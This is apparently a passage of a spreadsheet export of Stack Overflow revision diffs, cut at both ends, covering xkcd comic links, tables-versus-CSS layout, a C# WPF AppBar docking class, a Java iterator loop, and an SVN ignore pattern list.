   &lt;/ul&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Another one from &lt;a href="http://xkcd.com/327/" rel="nofollow noreferrer"&gt;xkcd&lt;/a&gt; &lt;a href="http://imgs.xkcd.com/comics/exploits_of_a_mom.png" rel="nofollow noreferrer" title="Her daughter is named Help I'm trapped in a driver's license factory."&gt;Exploits of a Mom http://imgs.xkcd.com/comics/exploits_of_a_mom.png&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; I like this&lt;/span&gt;&lt;img class="diff-delete" src="https://i.stack.imgur.com/FU4ix.jpg" alt="alt text"&gt;&lt;span class="diff-delete"&gt; one:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Another one from &lt;a href="http://xkcd.com/327/" rel="nofollow noreferrer"&gt;xkcd&lt;/a&gt; &lt;a href="http://imgs.xkcd.com/comics/exploits_of_a_mom.png" rel="nofollow noreferrer" title="Her daughter is named Help I'm trapped in a driver's license factory."&gt;Exploits of a Mom http://imgs.xkcd.com/comics/exploits_of_a_mom.png&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Jarrod Dixon</t>
  </si>
  <si>
    <t>Frank R.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://xkcd.com/208/" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;alt text http://imgs.xkcd.com/comics/regular_expressions.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;a href="http://xkcd.com/208/" rel="nofollow noreferrer" title="&amp;quot;Wait, forgot to escape a space.  Wheeeeee[taptaptap]eeeeee.&amp;quot;"&gt;&lt;span class="diff-add"&gt;alt text http://imgs.xkcd.com/comics/regular_expressions.png&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>JK.</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The majority of professional web developers seem to oppose you&lt;/span&gt;. That tables &lt;em&gt;are&lt;/em&gt; in fact less maintainable should be obvious. Using tables for layout means that changing the corporate layout will in fact mean changing every single page. This can be &lt;em&gt;very&lt;/em&gt; expensive. On the other hand, judicious use of semantically meaningful HTML combined with CSS &lt;em&gt;might&lt;/em&gt; confine such changes to the CSS and the pictures used.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;del&gt;&lt;span class="diff-add"&gt;The majority of professional web developers seem to oppose you&lt;/span&gt;&lt;/del&gt;&lt;sup&gt;&lt;span class="diff-add"&gt;[&lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;citation needed&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;]&lt;/span&gt;&lt;/sup&gt;. That tables &lt;em&gt;are&lt;/em&gt; in fact less maintainable should be obvious. Using tables for layout means that changing the corporate layout will in fact mean changing every single page. This can be &lt;em&gt;very&lt;/em&gt; expensive. On the other hand, judicious use of semantically meaningful HTML combined with CSS &lt;em&gt;might&lt;/em&gt; confine such changes to the CSS and the pictures used.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Sergio Tapia</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System;_x000D_
using System.Collections.Generic;_x000D_
using System.Runtime.InteropServices;_x000D_
using System.Windows;_x000D_
using System.Windows.Interop;_x000D_
using System.Windows.Threading;_x000D_
_x000D_
namespace AppBarApplication_x000D_
{    _x000D_
    public enum ABEdge : int_x000D_
    {_x000D_
        Left = 0,_x000D_
        Top,_x000D_
        Right,_x000D_
        Bottom,_x000D_
        None_x000D_
    }_x000D_
_x000D_
    internal static class AppBarFunctions_x000D_
    {_x000D_
        [StructLayout(LayoutKind.Sequential)]_x000D_
        private struct RECT_x000D_
        {_x000D_
            public int left;_x000D_
            public int top;_x000D_
            public int right;_x000D_
            public int bottom;_x000D_
        }_x000D_
_x000D_
        [StructLayout(LayoutKind.Sequential)]_x000D_
        private struct APPBARDATA_x000D_
        {_x000D_
            public int cbSize;_x000D_
            public IntPtr hWnd;_x000D_
            public int uCallbackMessage;_x000D_
            public int uEdge;_x000D_
            public RECT rc;_x000D_
            public IntPtr lParam;_x000D_
        }_x000D_
_x000D_
        private enum ABMsg : int_x000D_
        {_x000D_
            ABM_NEW = 0,_x000D_
            ABM_REMOVE,_x000D_
            ABM_QUERYPOS,_x000D_
            ABM_SETPOS,_x000D_
            ABM_GETSTATE,_x000D_
            ABM_GETTASKBARPOS,_x000D_
            ABM_ACTIVATE,_x000D_
            ABM_GETAUTOHIDEBAR,_x000D_
            ABM_SETAUTOHIDEBAR,_x000D_
            ABM_WINDOWPOSCHANGED,_x000D_
            ABM_SETSTATE_x000D_
        }_x000D_
        private enum ABNotify : int_x000D_
        {_x000D_
            ABN_STATECHANGE = 0,_x000D_
            ABN_POSCHANGED,_x000D_
            ABN_FULLSCREENAPP,_x000D_
            ABN_WINDOWARRANGE_x000D_
        }_x000D_
_x000D_
        [DllImport("SHELL32", CallingConvention = CallingConvention.StdCall)]_x000D_
        private static extern uint SHAppBarMessage(int dwMessage, ref APPBARDATA pData);_x000D_
        _x000D_
        [DllImport("User32.dll", CharSet = CharSet.Auto)]_x000D_
        private static extern int RegisterWindowMessage(string msg);_x000D_
_x000D_
        private class RegisterInfo_x000D_
        {_x000D_
            public int CallbackId { get; set; }_x000D_
            public bool IsRegistered { get; set; }_x000D_
            public Window Window { get; set; }_x000D_
            public ABEdge Edge { get; set; }_x000D_
            public WindowStyle OriginalStyle { get; set; }            _x000D_
            public Point OriginalPosition { get; set; }_x000D_
            public Size OriginalSize { get; set; }_x000D_
            public ResizeMode OriginalResizeMode { get; set; }_x000D_
_x000D_
_x000D_
            public IntPtr WndProc(IntPtr hwnd, int msg, IntPtr wParam, _x000D_
                                    IntPtr lParam, ref bool handled)_x000D_
            {_x000D_
                if (msg == CallbackId)_x000D_
                {_x000D_
                    if (wParam.ToInt32() == (int)ABNotify.ABN_POSCHANGED)_x000D_
                    {_x000D_
                        ABSetPos(Edge, Window);_x000D_
                        handled = true;_x000D_
                    }_x000D_
                }_x000D_
                return IntPtr.Zero;_x000D_
            }_x000D_
_x000D_
        }_x000D_
        private static Dictionary&amp;lt;Window, RegisterInfo&amp;gt; s_RegisteredWindowInfo _x000D_
            = new Dictionary&amp;lt;Window, RegisterInfo&amp;gt;();_x000D_
        private static RegisterInfo GetRegisterInfo(Window appbarWindow)_x000D_
        {_x000D_
            RegisterInfo reg;_x000D_
            if( s_RegisteredWindowInfo.ContainsKey(appbarWindow))_x000D_
            {_x000D_
                reg = s_RegisteredWindowInfo[appbarWindow];_x000D_
            }_x000D_
            else_x000D_
            {_x000D_
                reg = new RegisterInfo()_x000D_
                    {_x000D_
                        CallbackId = 0,_x000D_
                        Window = appbarWindow,_x000D_
                        IsRegistered = false,_x000D_
                        Edge = ABEdge.Top,_x000D_
                        OriginalStyle = appbarWindow.WindowStyle,                        _x000D_
                        OriginalPosition =new Point( appbarWindow.Left, appbarWindow.Top),_x000D_
                        OriginalSize = _x000D_
                            new Size( appbarWindow.ActualWidth, appbarWindow.ActualHeight),_x000D_
                        OriginalResizeMode = appbarWindow.ResizeMode,_x000D_
                    };_x000D_
                s_RegisteredWindowInfo.Add(appbarWindow, reg);_x000D_
            }_x000D_
            return reg;_x000D_
        }_x000D_
_x000D_
        private static void RestoreWindow(Window appbarWindow)_x000D_
        {_x000D_
            RegisterInfo info = GetRegisterInfo(appbarWindow);_x000D_
_x000D_
            appbarWindow.WindowStyle = info.OriginalStyle;            _x000D_
            appbarWindow.ResizeMode = info.OriginalResizeMode;_x000D_
            appbarWindow.Topmost = false;_x000D_
_x000D_
            Rect rect = new Rect(info.OriginalPosition.X, info.OriginalPosition.Y, _x000D_
                info.OriginalSize.Width, info.OriginalSize.Height);_x000D_
            appbarWindow.Dispatcher.BeginInvoke(DispatcherPriority.ApplicationIdle,_x000D_
                    new ResizeDelegate(DoResize), appbarWindow, rect);_x000D_
_x000D_
        }_x000D_
        _x000D_
        public static void SetAppBar(Window appbarWindow, ABEdge edge)_x000D_
        {_x000D_
            RegisterInfo info = GetRegisterInfo(appbarWindow);_x000D_
            info.Edge = edge;_x000D_
_x000D_
            APPBARDATA abd = new APPBARDATA();_x000D_
            abd.cbSize = Marshal.SizeOf(abd);_x000D_
            abd.hWnd = new WindowInteropHelper(appbarWindow).&lt;span class="diff-delete"&gt;EnsureHandle(); // .net 4&lt;/span&gt;_x000D_
_x000D_
            if( edge == ABEdge.None)_x000D_
            {_x000D_
                if( info.IsRegistered)_x000D_
                {_x000D_
                    SHAppBarMessage((int)ABMsg.ABM_REMOVE, ref abd);_x000D_
                    info.IsRegistered = false;_x000D_
                }_x000D_
                RestoreWindow(appbarWindow);_x000D_
                return;_x000D_
            }_x000D_
_x000D_
            if (!info.IsRegistered)_x000D_
            {_x000D_
                info.IsRegistered = true; _x000D_
                info.CallbackId = RegisterWindowMessage("AppBarMessage");_x000D_
                abd.uCallbackMessage = info.CallbackId;_x000D_
_x000D_
                uint ret = SHAppBarMessage((int)ABMsg.ABM_NEW, ref abd);_x000D_
_x000D_
                HwndSource source = HwndSource.FromHwnd(abd.hWnd);_x000D_
                source.AddHook(new HwndSourceHook(info.WndProc));_x000D_
            }_x000D_
_x000D_
            appbarWindow.WindowStyle = WindowStyle.None;            _x000D_
            appbarWindow.ResizeMode = ResizeMode.NoResize;_x000D_
            appbarWindow.Topmost = true;_x000D_
_x000D_
            ABSetPos(info.Edge, appbarWindow);                _x000D_
        }_x000D_
_x000D_
        private delegate void ResizeDelegate(Window appbarWindow, Rect rect);_x000D_
        private static void DoResize(Window appbarWindow, Rect rect)_x000D_
        {_x000D_
            appbarWindow.Width = rect.Width;_x000D_
            appbarWindow.Height = rect.Height;_x000D_
            appbarWindow.Top = rect.Top;_x000D_
            appbarWindow.Left = rect.Left;_x000D_
        }_x000D_
_x000D_
_x000D_
_x000D_
        private static void ABSetPos(ABEdge edge, Window appbarWindow)_x000D_
        {_x000D_
            APPBARDATA barData = new APPBARDATA();_x000D_
            barData.cbSize = Marshal.SizeOf(barData);_x000D_
            barData.hWnd = new WindowInteropHelper(appbarWindow).Handle;_x000D_
            barData.uEdge = (int)edge;_x000D_
_x000D_
            if (barData.uEdge == (int)ABEdge.Left || barData.uEdge == (int)ABEdge.Right)_x000D_
            {_x000D_
                barData.rc.top = 0;_x000D_
                barData.rc.bottom = (int)SystemParameters.PrimaryScreenHeight;_x000D_
                if (barData.uEdge == (int)ABEdge.Left)_x000D_
                {_x000D_
                    barData.rc.left = 0;_x000D_
                    barData.rc.right = (int)Math.Round(appbarWindow.ActualWidth);_x000D_
                }_x000D_
                else_x000D_
                {_x000D_
                    barData.rc.right = (int)SystemParameters.PrimaryScreenWidth;_x000D_
                    barData.rc.left = barData.rc.right - (int)Math.Round(appbarWindow.ActualWidth);_x000D_
                }_x000D_
            }_x000D_
            else_x000D_
            {_x000D_
                barData.rc.left = 0;_x000D_
                barData.rc.right = (int)SystemParameters.PrimaryScreenWidth;_x000D_
                if (barData.uEdge == (int)ABEdge.Top)_x000D_
                {_x000D_
                    barData.rc.top = 0;_x000D_
                    barData.rc.bottom = (int)Math.Round(appbarWindow.ActualHeight);_x000D_
                }_x000D_
                else_x000D_
                {_x000D_
                    barData.rc.bottom = (int)SystemParameters.PrimaryScreenHeight;_x000D_
                    barData.rc.top = barData.rc.bottom - (int)Math.Round(appbarWindow.ActualHeight);_x000D_
                }_x000D_
            }_x000D_
_x000D_
            SHAppBarMessage((int)ABMsg.ABM_QUERYPOS, ref barData);_x000D_
            SHAppBarMessage((int)ABMsg.ABM_SETPOS, ref barData);_x000D_
_x000D_
            Rect rect = new Rect((double)barData.rc.left, (double)barData.rc.top, _x000D_
                (double)(barData.rc.right - barData.rc.left), (double)(barData.rc.bottom - barData.rc.top));_x000D_
            //This is done async, because WPF will send a resize after a new appbar is added.  _x000D_
            //if we size right away, WPFs resize comes last and overrides us._x000D_
            appbarWindow.Dispatcher.BeginInvoke(DispatcherPriority.ApplicationIdle, _x000D_
                new ResizeDelegate(DoResize), appbarWindow, rect);_x000D_
        }_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;using System;_x000D_
using System.Collections.Generic;_x000D_
using System.Runtime.InteropServices;_x000D_
using System.Windows;_x000D_
using System.Windows.Interop;_x000D_
using System.Windows.Threading;_x000D_
_x000D_
namespace AppBarApplication_x000D_
{    _x000D_
    public enum ABEdge : int_x000D_
    {_x000D_
        Left = 0,_x000D_
        Top,_x000D_
        Right,_x000D_
        Bottom,_x000D_
        None_x000D_
    }_x000D_
_x000D_
    internal static class AppBarFunctions_x000D_
    {_x000D_
        [StructLayout(LayoutKind.Sequential)]_x000D_
        private struct RECT_x000D_
        {_x000D_
            public int left;_x000D_
            public int top;_x000D_
            public int right;_x000D_
            public int bottom;_x000D_
        }_x000D_
_x000D_
        [StructLayout(LayoutKind.Sequential)]_x000D_
        private struct APPBARDATA_x000D_
        {_x000D_
            public int cbSize;_x000D_
            public IntPtr hWnd;_x000D_
            public int uCallbackMessage;_x000D_
            public int uEdge;_x000D_
            public RECT rc;_x000D_
            public IntPtr lParam;_x000D_
        }_x000D_
_x000D_
        private enum ABMsg : int_x000D_
        {_x000D_
            ABM_NEW = 0,_x000D_
            ABM_REMOVE,_x000D_
            ABM_QUERYPOS,_x000D_
            ABM_SETPOS,_x000D_
            ABM_GETSTATE,_x000D_
            ABM_GETTASKBARPOS,_x000D_
            ABM_ACTIVATE,_x000D_
            ABM_GETAUTOHIDEBAR,_x000D_
            ABM_SETAUTOHIDEBAR,_x000D_
            ABM_WINDOWPOSCHANGED,_x000D_
            ABM_SETSTATE_x000D_
        }_x000D_
        private enum ABNotify : int_x000D_
        {_x000D_
            ABN_STATECHANGE = 0,_x000D_
            ABN_POSCHANGED,_x000D_
            ABN_FULLSCREENAPP,_x000D_
            ABN_WINDOWARRANGE_x000D_
        }_x000D_
_x000D_
        [DllImport("SHELL32", CallingConvention = CallingConvention.StdCall)]_x000D_
        private static extern uint SHAppBarMessage(int dwMessage, ref APPBARDATA pData);_x000D_
        _x000D_
        [DllImport("User32.dll", CharSet = CharSet.Auto)]_x000D_
        private static extern int RegisterWindowMessage(string msg);_x000D_
_x000D_
        private class RegisterInfo_x000D_
        {_x000D_
            public int CallbackId { get; set; }_x000D_
            public bool IsRegistered { get; set; }_x000D_
            public Window Window { get; set; }_x000D_
            public ABEdge Edge { get; set; }_x000D_
            public WindowStyle OriginalStyle { get; set; }            _x000D_
            public Point OriginalPosition { get; set; }_x000D_
            public Size OriginalSize { get; set; }_x000D_
            public ResizeMode OriginalResizeMode { get; set; }_x000D_
_x000D_
_x000D_
            public IntPtr WndProc(IntPtr hwnd, int msg, IntPtr wParam, _x000D_
                                    IntPtr lParam, ref bool handled)_x000D_
            {_x000D_
                if (msg == CallbackId)_x000D_
                {_x000D_
                    if (wParam.ToInt32() == (int)ABNotify.ABN_POSCHANGED)_x000D_
                    {_x000D_
                        ABSetPos(Edge, Window);_x000D_
                        handled = true;_x000D_
                    }_x000D_
                }_x000D_
                return IntPtr.Zero;_x000D_
            }_x000D_
_x000D_
        }_x000D_
        private static Dictionary&amp;lt;Window, RegisterInfo&amp;gt; s_RegisteredWindowInfo _x000D_
            = new Dictionary&amp;lt;Window, RegisterInfo&amp;gt;();_x000D_
        private static RegisterInfo GetRegisterInfo(Window appbarWindow)_x000D_
        {_x000D_
            RegisterInfo reg;_x000D_
            if( s_RegisteredWindowInfo.ContainsKey(appbarWindow))_x000D_
            {_x000D_
                reg = s_RegisteredWindowInfo[appbarWindow];_x000D_
            }_x000D_
            else_x000D_
            {_x000D_
                reg = new RegisterInfo()_x000D_
                    {_x000D_
                        CallbackId = 0,_x000D_
                        Window = appbarWindow,_x000D_
                        IsRegistered = false,_x000D_
                        Edge = ABEdge.Top,_x000D_
                        OriginalStyle = appbarWindow.WindowStyle,                        _x000D_
                        OriginalPosition =new Point( appbarWindow.Left, appbarWindow.Top),_x000D_
                        OriginalSize = _x000D_
                            new Size( appbarWindow.ActualWidth, appbarWindow.ActualHeight),_x000D_
                        OriginalResizeMode = appbarWindow.ResizeMode,_x000D_
                    };_x000D_
                s_RegisteredWindowInfo.Add(appbarWindow, reg);_x000D_
            }_x000D_
            return reg;_x000D_
        }_x000D_
_x000D_
        private static void RestoreWindow(Window appbarWindow)_x000D_
        {_x000D_
            RegisterInfo info = GetRegisterInfo(appbarWindow);_x000D_
_x000D_
            appbarWindow.WindowStyle = info.OriginalStyle;            _x000D_
            appbarWindow.ResizeMode = info.OriginalResizeMode;_x000D_
            appbarWindow.Topmost = false;_x000D_
_x000D_
            Rect rect = new Rect(info.OriginalPosition.X, info.OriginalPosition.Y, _x000D_
                info.OriginalSize.Width, info.OriginalSize.Height);_x000D_
            appbarWindow.Dispatcher.BeginInvoke(DispatcherPriority.ApplicationIdle,_x000D_
                    new ResizeDelegate(DoResize), appbarWindow, rect);_x000D_
_x000D_
        }_x000D_
        _x000D_
        public static void SetAppBar(Window appbarWindow, ABEdge edge)_x000D_
        {_x000D_
            RegisterInfo info = GetRegisterInfo(appbarWindow);_x000D_
            info.Edge = edge;_x000D_
_x000D_
            APPBARDATA abd = new APPBARDATA();_x000D_
            abd.cbSize = Marshal.SizeOf(abd);_x000D_
            abd.hWnd = new WindowInteropHelper(appbarWindow).&lt;span class="diff-add"&gt;Handle;&lt;/span&gt;_x000D_
_x000D_
            if( edge == ABEdge.None)_x000D_
            {_x000D_
                if( info.IsRegistered)_x000D_
                {_x000D_
                    SHAppBarMessage((int)ABMsg.ABM_REMOVE, ref abd);_x000D_
                    info.IsRegistered = false;_x000D_
                }_x000D_
                RestoreWindow(appbarWindow);_x000D_
                return;_x000D_
            }_x000D_
_x000D_
            if (!info.IsRegistered)_x000D_
            {_x000D_
                info.IsRegistered = true; _x000D_
                info.CallbackId = RegisterWindowMessage("AppBarMessage");_x000D_
                abd.uCallbackMessage = info.CallbackId;_x000D_
_x000D_
                uint ret = SHAppBarMessage((int)ABMsg.ABM_NEW, ref abd);_x000D_
_x000D_
                HwndSource source = HwndSource.FromHwnd(abd.hWnd);_x000D_
                source.AddHook(new HwndSourceHook(info.WndProc));_x000D_
            }_x000D_
_x000D_
            appbarWindow.WindowStyle = WindowStyle.None;            _x000D_
            appbarWindow.ResizeMode = ResizeMode.NoResize;_x000D_
            appbarWindow.Topmost = true;_x000D_
_x000D_
            ABSetPos(info.Edge, appbarWindow);                _x000D_
        }_x000D_
_x000D_
        private delegate void ResizeDelegate(Window appbarWindow, Rect rect);_x000D_
        private static void DoResize(Window appbarWindow, Rect rect)_x000D_
        {_x000D_
            appbarWindow.Width = rect.Width;_x000D_
            appbarWindow.Height = rect.Height;_x000D_
            appbarWindow.Top = rect.Top;_x000D_
            appbarWindow.Left = rect.Left;_x000D_
        }_x000D_
_x000D_
_x000D_
_x000D_
        private static void ABSetPos(ABEdge edge, Window appbarWindow)_x000D_
        {_x000D_
            APPBARDATA barData = new APPBARDATA();_x000D_
            barData.cbSize = Marshal.SizeOf(barData);_x000D_
            barData.hWnd = new WindowInteropHelper(appbarWindow).Handle;_x000D_
            barData.uEdge = (int)edge;_x000D_
_x000D_
            if (barData.uEdge == (int)ABEdge.Left || barData.uEdge == (int)ABEdge.Right)_x000D_
            {_x000D_
                barData.rc.top = 0;_x000D_
                barData.rc.bottom = (int)SystemParameters.PrimaryScreenHeight;_x000D_
                if (barData.uEdge == (int)ABEdge.Left)_x000D_
                {_x000D_
                    barData.rc.left = 0;_x000D_
                    barData.rc.right = (int)Math.Round(appbarWindow.ActualWidth);_x000D_
                }_x000D_
                else_x000D_
                {_x000D_
                    barData.rc.right = (int)SystemParameters.PrimaryScreenWidth;_x000D_
                    barData.rc.left = barData.rc.right - (int)Math.Round(appbarWindow.ActualWidth);_x000D_
                }_x000D_
            }_x000D_
            else_x000D_
            {_x000D_
                barData.rc.left = 0;_x000D_
                barData.rc.right = (int)SystemParameters.PrimaryScreenWidth;_x000D_
                if (barData.uEdge == (int)ABEdge.Top)_x000D_
                {_x000D_
                    barData.rc.top = 0;_x000D_
                    barData.rc.bottom = (int)Math.Round(appbarWindow.ActualHeight);_x000D_
                }_x000D_
                else_x000D_
                {_x000D_
                    barData.rc.bottom = (int)SystemParameters.PrimaryScreenHeight;_x000D_
                    barData.rc.top = barData.rc.bottom - (int)Math.Round(appbarWindow.ActualHeight);_x000D_
                }_x000D_
            }_x000D_
_x000D_
            SHAppBarMessage((int)ABMsg.ABM_QUERYPOS, ref barData);_x000D_
            SHAppBarMessage((int)ABMsg.ABM_SETPOS, ref barData);_x000D_
_x000D_
            Rect rect = new Rect((double)barData.rc.left, (double)barData.rc.top, _x000D_
                (double)(barData.rc.right - barData.rc.left), (double)(barData.rc.bottom - barData.rc.top));_x000D_
            //This is done async, because WPF will send a resize after a new appbar is added.  _x000D_
            //if we size right away, WPFs resize comes last and overrides us._x000D_
            appbarWindow.Dispatcher.BeginInvoke(DispatcherPriority.ApplicationIdle, _x000D_
                new ResizeDelegate(DoResize), appbarWindow, rect);_x000D_
        }_x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Philip Rieck</t>
  </si>
  <si>
    <t>Max</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(Iterator&amp;lt;String&amp;gt; i = someList.iterator(); i.hasNext(); ) {_x000D_
    String item = i.next();_x000D_
    System.out.println(item);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that if you need to use &lt;code&gt;i.remove();&lt;/code&gt; in your loop, or access the actual &lt;code&gt;iterator&lt;/code&gt; in some way, you cannot use the &lt;code&gt;for( : )&lt;/code&gt; idiom, since the actual &lt;code&gt;Iterator&lt;/code&gt; is merely inferred.&lt;/p&gt; _x000D_
 &lt;p&gt; As was noted by Denis Bueno, this code works for any object that &lt;code&gt;implements&lt;/code&gt; the &lt;a href="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Iterable.html" rel="nofollow noreferrer"&gt;&lt;code&gt;Iterable interface&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, if the right-hand side of the &lt;code&gt;for(:)&lt;/code&gt; idiom is an &lt;code&gt;array&lt;/code&gt; rather than an &lt;code&gt;Iterable&lt;/code&gt; object, the internal code uses an int index counter and checks against array.length instead.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt;&lt;span class="hljs-keyword"&gt;for&lt;/span&gt;(Iterator&amp;lt;String&amp;gt; i = someList.iterator(); i.hasNext(); ) {_x000D_
    String item = i.next();_x000D_
    System.out.println(item);_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note that if you need to use &lt;code&gt;i.remove();&lt;/code&gt; in your loop, or access the actual &lt;code&gt;iterator&lt;/code&gt; in some way, you cannot use the &lt;code&gt;for( : )&lt;/code&gt; idiom, since the actual &lt;code&gt;Iterator&lt;/code&gt; is merely inferred.&lt;/p&gt; _x000D_
 &lt;p&gt; As was noted by Denis Bueno, this code works for any object that &lt;code&gt;implements&lt;/code&gt; the &lt;a href="http://docs.oracle.com/javase/1.5.0/docs/api/java/lang/Iterable.html" rel="nofollow noreferrer"&gt;&lt;code&gt;Iterable interface&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, if the right-hand side of the &lt;code&gt;for(:)&lt;/code&gt; idiom is an &lt;code&gt;array&lt;/code&gt; rather than an &lt;code&gt;Iterable&lt;/code&gt; object, the internal code uses an int index counter and checks against array.length instead.&lt;span class="diff-add"&gt; See &lt;/span&gt;&lt;a href="http://forums.sun.com/thread.jspa?messageID=2743233" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;http://forums.sun.com/thread.jspa?messageID=2743233&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Chris Stratton</t>
  </si>
  <si>
    <t>PhoneixS</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'll add my own two cents to this question:&lt;/p&gt; _x000D_
 &lt;p&gt; I use the following SVN ignore pattern with TortoiseSVN and Subversion CLI for native C++, C#/VB.NET, and PERL projects on both Windows and Linux platforms. It works well for me!&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;span class="diff-delete"&gt;*.o *.lo *.la #*# .*.rej *.rej .*~ *~ .#* .DS_Store thumbs.db _x000D_
Thumbs.db *.bak *.class *.exe *.dll *.mine *.obj *.ncb *.lib *.log _x000D_
*.idb *.pdb *.ilk *.msi* .res *.pch *.suo *.exp *.*~ *.~* ~*.* cvs _x000D_
CVS .CVS .cvs release Release debug Debug ignore Ignore bin Bin obj _x000D_
Obj *.csproj.user *.user&lt;/span&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'll add my own two cents to this question:&lt;/p&gt; _x000D_
 &lt;p&gt; I use the following SVN ignore pattern with TortoiseSVN and Subversion CLI for native C++, C#/VB.NET, and PERL projects on both Windows and Linux platforms. It works well for me!&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; *.o &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.lo &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.la #&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;# .&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;.rej &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.rej .&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;~ &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;~ .#&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; .DS_Store thumbs.db Thumbs.db *.bak *.class *.exe *.dll *.mine *.obj *.ncb *.lib *.log *.idb *.pdb *.ilk &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.msi&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; .res *.pch &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.suo &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.exp &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;~ &lt;/span&gt;&lt;em&gt;&lt;span class="diff-add"&gt;.~&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; ~&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-add"&gt; cvs CVS .CVS .cvs release Release debug Debug ignore Ignore bin Bin obj Obj *.csproj.user *.user&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Zach Burlingame</t>
  </si>
  <si>
    <t>Blorgbeard</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Religious debates are always fun!&lt;/p&gt; _x000D_
 &lt;a href="http://xkcd.com/378/" rel="nofollow noreferrer"&gt; http://imgs.xkcd.com/comics/real_programmers.png &lt;/a&gt; _x000D_
